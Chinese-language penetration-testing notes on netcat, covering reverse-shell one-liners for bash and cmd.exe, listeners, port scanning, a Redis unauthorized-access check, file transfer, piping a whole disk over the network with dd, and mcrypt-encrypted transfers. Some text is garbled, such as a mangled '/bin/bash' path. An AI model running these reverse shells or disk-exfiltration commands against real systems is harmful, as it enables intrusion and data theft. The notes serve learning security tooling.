netcat:瑞士军刀,小巧、方便、功能强大。打破僵局,多在exp中使用
poc:验证所谓的脆弱性是否存在。
exp:攻击利用行为。拿到权限(反弹shell)
=====================================================
例子:redies未授权访问漏洞poc
满足点:端口开放 允许访问 是否可以输入输出
=============================================================
nc用法:
1.nc -h 帮助
2.nc -e/美好的香烟/bash ip port 形成管道 反弹
3.nc -vvl 监听
=================================================
弹shell :D:\nc.exe ip port -e cmd.exe
监听:nc -lvp port
===============================================
文件上传漏洞:
页面请求:
1.nc ip port
2.OPTIONS/HTTP/1.1
===============================
端口扫描:nc -v -n -z -w 1 ip+port 1-200
nc -z 扫描
-w超时连接
-v详细信息
-l 监听
-n 仅ip地址
====================================
聊天:
1.nc -lvp 5678
2.另一台主机 弹出nc ip port
======================================
文件传送:
甲:nc -lvp 香港vps port
乙:nc ip port < 文件名
或:
甲:nc -lvp port >/ / /文件路径+文件名
乙:nc IP port < 文件名
nc 克隆
A:nc -l 9999|dd of =/dev/sda
B:dd if=/dev/sda |nc -nv 10.104.11.128 9999
nc发出的都是明文
如何把nc进行密文传输
nc实现密文传输:
1.更新kali源source.list
2.A: nc -lp 333 | mcrypt–flush-Fbqd -a rijndael-256 -m ecb > 1.mp4{在本地侦听333端口,等待接收文件(等待着别人给传文件),将接收到的文件重定向对其进行解密,最后保存为本地文件!}
其实在本次传输过程中,是B端先将文件进行加密,之后再重定向通过nc传输给A端。
3. B: mcrypt –flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.14.23 333 -q 1 {将a.mp4的内容输入给加密指令进行加密,之后将加密后的文件管道给nc,nc再去连接A端的333端口,一旦连上,立即传输,传输完成以后延迟1秒断开连接}
94829743